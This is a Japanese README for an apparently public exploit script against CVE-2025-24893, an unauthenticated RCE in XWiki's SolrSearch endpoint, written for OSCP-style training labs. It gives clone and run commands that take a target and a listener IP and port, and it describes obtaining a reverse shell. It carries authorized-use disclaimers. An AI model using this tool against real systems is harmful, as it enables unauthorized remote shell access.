
Linux XWiki向けOSCPライクなCVE-2025-24893エクスプロイト
XWiki Platformは、その上に構築されたアプリケーションにランタイムサービスを提供する汎用ウィキプラットフォームです。SolrSearchエンドポイントの脆弱性により、認証されていないユーザーが任意のリモートコード実行を達成できます。この脆弱性は、XWikiインストール全体の機密性、完全性、可用性に影響を与えます。
CVE: CVE-2025-24893
エクスプロイトのデモを以下に示します:

このエクスプロイトを使用するには、以下の手順に従ってください:
git clone https://github.com/yourusername/CVE-2025-24893.gitcd CVE-2025-24893pip install requests./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
このエクスプロイトは、CVE-2025-24893で説明されているリモートコード実行の脆弱性を実証し、認証されていないユーザーが脆弱なLinuxベースのXWikiインストール上でリバースシェルを取得することを可能にします。
私は元々、OSCP準備ラボやHack The Boxなどのトレーニング環境で使用するためにこのツールを開発しました。そこでは、脆弱性を再現するためのシンプルで信頼性の高い方法が必要でした。既存のツールが要件を満たしていなかったため、自作することにしました。
CVE-2025-24893はサポート対象のXWikiリリースではずっと前に修正されていますが、このエクスプロイトは、自分が所有するシステムまたは明示的にテストを許可されたシステムに対してのみ使用してください。
作者は、本ソフトウェアの誤用またはその使用に起因するいかなる損害についても一切の責任を負いません。
このツールは教育目的および許可されたセキュリティ評価専用です。
自分が所有するシステムまたは明示的にテストを許可されたシステムに対してのみ使用してください。作者は、本ソフトウェアの誤用またはその使用に起因するいかなる損害についても一切の責任を負いません。
コントリビューションを歓迎します。
バグを発見した場合、改善の提案がある場合、または追加のペイロード、プラットフォーム、機能のサポートを追加したい場合は、遠慮なくIssueを開くかプルリクエストを送信してください。
建設的なフィードバック、テストレポート、コードのコントリビューションは大変感謝されます。